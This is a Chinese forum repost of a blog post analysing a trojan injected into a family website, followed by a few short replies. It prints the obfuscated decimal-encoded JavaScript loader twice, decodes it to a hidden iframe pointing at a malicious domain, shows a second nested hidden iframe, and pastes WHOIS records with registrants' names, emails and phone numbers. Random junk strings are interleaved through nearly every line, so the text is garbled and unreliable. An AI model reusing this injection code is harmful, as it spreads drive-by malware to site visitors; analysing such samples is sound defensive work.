[原创]一篇刚写的分析木马手记

首发在我的博客里面， -8:O?]+Q/  
r
& RJ'z  
http://www.areway.cn/?p=175 NVVAh5R  
3F6'3NvVc2  
F0m[ls$  
周末上线鸭子就Q我说他的站给挂了马，当时没太注意就直接打开了连接，截下了网页源码： C#&b`  
          w6 Y+Y;,'f  
<script>t=’60,105,102,114,97,109,101, 8}z PDs  
32,115,114,99,61,104,116,116,112,58,47,47, 'o_ RC{k2"  
102,114,101,101,46,117,45,117,117,117,46,99, U;4;
>  
110,47,101,114,114,111,114,46,104,116,109, (^=kV?<  
32,119,105,100,116,104,61,49,48,48,32,104, d6W&u~  
101,105,103,104,116,61,48,62,60,47,105,102, VuBi_v6  
114,97,109,101,62′; 1^Q!EV  
t=eval(’String.fromCharCode(’+t+’)');document.write(t);</script>
acpc[^'  
                                                                                                  \ }-v
 
<script>t=’60,105,102,114,97,109,101,32,115, yYC\a7Al4  
114,99,61,104,116,116,112,58,47,47,102,114, 7|m{hSc  
101,101,46,117,45,117,117,117,46,99,110,47, 8Z@O%\1x6  
101,114,114,111,114,46,104,116,109,32,119, ;r;>4+zn\  
105,100,116,104,61,49,48,48,32,104,101,105, I tn?''~;  
103,104,116,61,48,62,60,47,105,102,114,97, ]~WIGl"g  
109,101,62′;t=eval(’String.fromCharCode(’+t+’)'); LQ$dT#z2A  
document.write(t);</script> Xp^>SSt:4  
                                                                                                  X bV?=  
<html xmlns=” -r_Pp}s  
http://www.w3.org/1999/xhtml =c[mch%
E  
“> .bMU$O1  
<head> ?$7$# DX  
<!– Published By Newasp.cc 2007-12-7-18:03:23 –> ~"~uXNd  
<meta http-equiv=”Content-Type” content=”text/html; charset=gb2312″ /> %MfT5*||f  
<title>首页 - 爱生活家庭网 Dx3Sf}G `  
                                                                                                                                                    R[lA@q:  
上面有一段 script的十进制加密字段，里面的大概内容是，把所有的字符放在函数t里面，最后用doucment.write(t)来把字符串写在网页里面。 @XF/hhGE_y  
转换字符串后的大概内容是（谁点击后果自付）： _*(:6,8  
<script>t=’<iframe src=http://free.u-uuu.cn/error.htm width=……… .Vq_O u  
                                                                                                                                  7_7^&.Hh  
查询玉米u-uuu.cn的详细信息： piUfvw  
Domain Name: u-uuu.cn <>1*1%m  
ROID: 20070901s10001s64972306-cn ~m'8BK  
Domain Status: ok 3~0Xe  
Registrant Organization: 王雷 /Hc0~D4|x  
Registrant Name: 王雷 T/7[hj  
Administrative Email: czlovexs@126.com 7`X9s~B  
Sponsoring Registrar: 北京万网志成科技有限公司 B415{  
Name Server:ns.yovole.com k.0pPl  
Name Server:ns1.yovole.com %8L5uMx  
Registration Date: 2007-09-01 17:54 ;UjP0z
  
Expiration Date: 2008-09-01 17:54 y/?;s]>b  
最后PING了一下地址 都没有什么…. xeHqC9Ou  
                                                                                                 s@3<]  
上虚拟机里面继续分析，IE里面打开上面的连接…查看源代码…..直接又有嵌套. j%&^qD,  
<iframe src=http://www.foafau.info/ms15.htm width=1 height=1></iframe> iQaFR@  
<script language=”javascript” src=” In4T`c?kQ  
http://count43.51yes.com/click.aspx?id=4333375720&logo=6″></script "_&HM4%!  
> =7("xz%  
这个玉米应该有可能是木马作者的： @}N;C..Y$  
foafau.info的详细信息： [C~{g#  
Access to INFO WHOIS information is provided to assist persons in T\HP5&  
determining the contents of a domain name registration record in the _nnl+S>K  
Afilias registry database. The data in this record is provided by \RP=Gf  
Afilias Limited for informational purposes only, and Afilias does not Neb%D8/Kn  
guarantee its accuracy.  This service is intended only for query-based @*LESN>T@t  
access. You agree that you will use this data only for lawful purposes b+}*@xhl  
and that, under no circumstances will you use this data to: (a) allow, BUKh5L  
enable, or otherwise support the transmission by e-mail, telephone, or !NOvKC!  
facsimile of mass unsolicited, commercial advertising or solicitations w3IU'(|G  
to entities other than the data recipient’s own existing customers; or gs|%3k|  
(b) enable high volume, automated, electronic processes that send cXokq  
queries or data to the systems of Registry Operator, a Registrar, or -1u N Z{0  
Afilias except as reasonably necessary to register domain names or `Tf<w+H  
modify existing registrations. All rights reserved. Afilias reserves D&)gcO`\  
the right to modify these terms at any time. By submitting this query, ^coJ"[D  
you agree to abide by this policy. iN
s  
Domain ID:D22418703-LRMS hAZ
"M:f  
Domain Name:FOAFAU.INFO 7" cgj#  
Created On:20-Nov-2007 16:05:42 UTC 8eoDE. }  
Last Updated On:20-Nov-2007 16:05:44 UTC Vi>kK|\b  
Expiration Date:20-Nov-2008 16:05:42 UTC @{n2R3)k B  
Sponsoring Registrar:GoDaddy.com Inc. (R171-LRMS) mE]W#?   
Status:CLIENT DELETE PROHIBITED \oGZM0j  
Status:CLIENT RENEW PROHIBITED dTP$7nfe
 
Status:CLIENT TRANSFER PROHIBITED Ad7=JzV  
Status:CLIENT UPDATE PROHIBITED p>p=nLK  
Status:TRANSFER PROHIBITED G#0 4h{  
Registrant ID:GODA-040110615 "|"bo5M:   
Registrant Name:liu hong F;&'C$%  
Registrant Organization: WYE[H9x1?  
Registrant Street1:beijing Im_`q\i  
Registrant Street2: ]urcA,a  
Registrant Street3: N|1k6g=0  
Registrant City:beijing !'C^qrh  
Registrant State/Province: *K\/5Fzl  
Registrant Postal Code:100000 D &wm7,  
Registrant Country:CN 3C8'@-U  
Registrant Phone:+86.860108888777 Z,,Wo %)o  
Registrant Phone Ext.: x2T

Cw  
Registrant FAX: (#.)~poZ  
Registrant FAX Ext.: /$x6//0If  
Registrant Email:bbbshiji@163.com T[eTT]Z{Ia  
Admin ID:GODA-240110615 lBTgI"n=eK  
Admin Name:liu hong ni]gS0/  
Admin Organization: mvxg|<  
Admin Street1:beijing Z;i^h,j?$1  
Admin Street2: ZD0Q<8%
 
Admin Street3: fD|ox  
Admin City:beijing z
UxF"g-W  
Admin State/Province: 413r3/  
Admin Postal Code:100000 U07n7`2w  
Admin Country:CN d=wzN3 ;-  
Admin Phone:+86.860108888777 ^fb4g+Au  
Admin Phone Ext.: z{^XU"yB  
Admin FAX: 1}!f.cWV(  
Admin FAX Ext.: =RUKN38  
Admin Email:bbbshiji@163.com
F:M3^I  
Billing ID:GODA-340110615 hD l+  
Billing Name:liu hong *Qg/W?"m  
Billing Organization: Ph.$]yQCc]  
Billing Street1:beijing /^0Hi4+\  
Billing Street2: J]|-.Wv1  
Billing Street3: ?(U> )SvF  
Billing City:beijing U1rh[A>  
Billing State/Province: Y6fU;  
Billing Postal Code:100000 Ybx4 Up@  
Billing Country:CN $
X-,6*  
Billing Phone:+86.860108888777 Fu m1w  
Billing Phone Ext.: ^yu^Du  
Billing FAX: f=J#mmHw$  
Billing FAX Ext.:  c:~o e  
Billing Email:bbbshiji@163.com 4(YKwY2_L  
Tech ID:GODA-140110615 poHDA=# 3  
Tech Name:liu hong #,  vN  
Tech Organization: D9c8#k9Y.  
Tech Street1:beijing ">voi$Kzey  
Tech Street2: oc-7gz)  
Tech Street3: :ZU  
Tech City:beijing JCaT^KLz  
Tech State/Province: "Rs^0iT7>  
Tech Postal Code:100000 P67r+P,  
Tech Country:CN !Nl"y'B|  
Tech Phone:+86.860108888777 v?h#Ym3e<  
Tech Phone Ext.: &2#x(v  
Tech FAX: K22W=B)Ln  
Tech FAX Ext.: Mk[_y
qoCO  
Tech Email:bbbshiji@163.com #\4uu  
Name Server:NS27.DOMAINCONTROL.COM ;][1_  
Name Server:NS28.DOMAINCONTROL.COM WFN5&7$W  
Name Server: FQ(=Fnqn  
Name Server: #.tF&$ik  
Name Server:
o&LNtl;  
Name Server: -F|(Y1OE  
Name Server: 9[6*FAFJPP  
Name Server: rxCuV  
Name Server: m=NX;t  
Name Server: yNY1g?E  
Name Server: )X| uOg&|  
Name Server: {u46m   
Name Server: 3r^i>r8B  
                                                                                                          uu=e~K  
接着下载每个文件里面的代码：
|n67!1  
一步一步看.. AytHnp\H  
6eK18*j%H  
Fv5@-&y$W  
XF{}St~(  
31YzTbl[H  
)Cyrs~  
都是十进制的代码，也懒得再分析了，有这个爱好的大家可以继续试试

看过了就是没看懂。。。

要是有全部 就好了 传上来